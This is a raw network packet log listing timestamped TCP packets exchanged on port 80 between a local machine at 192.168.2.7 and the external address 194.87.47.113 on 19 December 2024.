Dec 19, 2024 08:47:37.367070913 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.367398977 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.367574930 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.367743969 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.368113041 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.368180037 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.368452072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.368793011 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.368866920 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.369280100 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.369638920 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.369728088 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.370405912 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.370894909 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.370963097 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.371277094 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.371285915 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.371334076 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.371959925 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.371968985 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.372025013 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.372683048 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.372980118 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.373049974 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.373368025 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.373742104 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.373796940 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.374042988 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.419065952 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.524456024 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.524580002 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.524688005 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.524739981 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.525033951 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.525192022 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.525448084 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.525762081 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.525844097 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.526232958 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.526434898 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.526592016 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.527044058 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.527379036 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.527686119 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.527834892 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.528033018 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.528096914 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.528614998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.529104948 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.529174089 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.529426098 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.529593945 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.529848099 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.530210972 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.530375004 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.530580044 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.531001091 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.531511068 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.531697989 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.531765938 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.532592058 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.532602072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.532752037 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.532910109 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.533061028 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.533365011 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.533611059 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.533699989 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.534178019 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.534466982 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.534622908 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.534936905 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.535176039 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.535249949 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.535764933 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.535978079 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.536221981 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.536750078 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.537328005 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.537393093 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.537513018 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.537528992 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.537571907 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.538089991 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.538414955 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.538578033 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.538888931 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.539165974 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.539339066 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.539738894 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.539748907 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.539957047 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.540498018 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.540739059 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.540807009 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.541311026 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.541462898 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.541557074 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.542067051 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.542327881 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.542515993 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.542864084 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.543124914 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.543211937 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.543675900 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.543989897 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.544074059 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.544475079 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.544713020 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.544774055 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.545264959 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.545274019 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.545384884 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.546015978 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.546597004 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.546717882 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.546802998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.547171116 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.547250032 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.547601938 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.547811985 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.547966957 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.548399925 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.548595905 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.548830032 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.549189091 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.549495935 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.549583912 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.549993038 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.550185919 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.550240993 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.550782919 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.551023960 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.551110983 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.551559925 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.551785946 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.551855087 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.552356958 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.552639008 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.552766085 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.553209066 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.553972006 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.553982019 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.554048061 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.554281950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.554336071 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.554729939 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.555003881 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.555103064 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.555529118 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.555722952 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.555804968 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.556315899 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.556730032 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.557110071 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.557137966 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.557311058 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.557523012 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.557934999 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.558129072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.558191061 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.558684111 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.559109926 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.559340954 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.559484959 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.559693098 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.559736967 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.560266972 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.560451984 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.560523033 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.561058998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.561470032 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.561537981 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.561836004 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.562083960 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.562151909 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.562642097 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.563461065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.563469887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.563517094 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.563786030 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.563939095 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.564229965 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.564496040 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.564613104 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.565407991 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.565891027 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.565901041 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.565958977 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.716891050 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.717020988 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.717113018 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.717418909 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.717875004 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.717973948 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.718115091 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.718444109 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.718499899 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.718852997 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.718868971 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.718950987 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.719666004 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.719860077 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.719934940 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.720432043 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.720626116 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.720694065 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.721246004 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.721770048 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.721887112 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.722008944 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.722387075 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.722449064 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.722784042 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.723056078 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.723124981 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.723602057 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.723829031 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.723962069 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.724402905 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.724581003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.724678993 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.725177050 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.725689888 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.725784063 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.725948095 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.725963116 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.726030111 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.726762056 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.727183104 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.727241993 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.727545023 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.728130102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.728203058 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.728346109 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.728627920 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.728684902 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.729129076 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.729964972 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.729973078 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.730062962 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.730293989 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.730429888 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.730746031 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.731019974 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.731112003 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.731589079 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.731596947 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.731652975 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.732335091 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.732664108 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.732728958 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.733110905 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.733586073 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.733663082 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.733912945 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.733920097 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.733999968 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.734697104 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.734966040 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.735156059 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.735466957 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.735769987 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.735836983 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.736277103 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.736444950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.736571074 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.737066031 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.737282038 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.737365007 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.737828016 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.738027096 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.738107920 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.738630056 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.739345074 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.739418983 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.739603996 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.739612103 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.739656925 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.740236998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.740657091 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.740742922 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.741005898 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.741832018 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.741838932 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.741918087 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.742147923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.742228985 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.742609978 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.742618084 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.742711067 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.743396997 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.743643045 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.743704081 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.744187117 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.744393110 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.744518042 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.744992018 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.745522976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.745624065 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.745800972 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.745815039 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.745914936 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.746646881 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.747229099 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.747335911 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.747431993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.747438908 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.747523069 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.748231888 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.748240948 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.748306990 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.748929977 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.749147892 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.749258995 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.749742985 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.749918938 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.749983072 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.750549078 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.750555992 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.750622034 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.751301050 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.751986027 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.752074957 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.752202034 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.752209902 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.752285957 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.752893925 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.753227949 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.753285885 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.754786015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.754795074 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.754899979 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.755466938 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.755475044 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.755633116 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.756985903 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.757729053 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.757735968 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.757865906 CET	49707	80	192.168.2.7	194.87.47.113
